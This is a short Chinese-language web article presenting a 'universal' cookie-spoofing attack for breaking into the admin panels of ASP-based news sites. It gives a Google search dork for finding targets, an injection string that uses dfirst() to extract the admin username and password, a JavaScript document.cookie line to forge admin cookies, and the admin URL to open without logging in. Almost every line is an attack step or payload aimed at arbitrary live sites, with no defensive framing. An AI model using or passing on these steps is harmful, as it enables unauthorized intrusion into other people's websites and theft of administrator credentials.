COOKIES欺骗通杀漏洞进后台

发布时间：2020-07-31 16:38:59 来源：网络阅读：1485 作者：许肖栏目：安全技术

在谷歌里搜索：inurl:news_more.asp?lm2=

搜索到如下站点：http://www.*********/news_more.asp?lm2=169

1.将“/news_more.asp?lm2=169”替换成“/admin/admin_news_pl_view.asp?id=1”

2.将 |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' 粘贴到如下框内，修改保存。

COOKIES欺骗通杀漏洞进后台

将 alert(document.cookie="adminuser=" + escape("1"));alert(document.cookie="adminpass=" + escape("2")); 代码拷贝进浏览器，回车；（注：标红1处填上图中1内容，2处填上图中2内容）

COOKIES欺骗通杀漏洞进后台点击确定。

5.将地址 http://www.*********/admin/admin_news_pl_view.asp?id=1 改成 http://www.*********/admin/admin_index.asp 回车，即可不用登录直接进入后台了。如图，

COOKIES欺骗通杀漏洞进后台

向AI问一下细节

猜你喜欢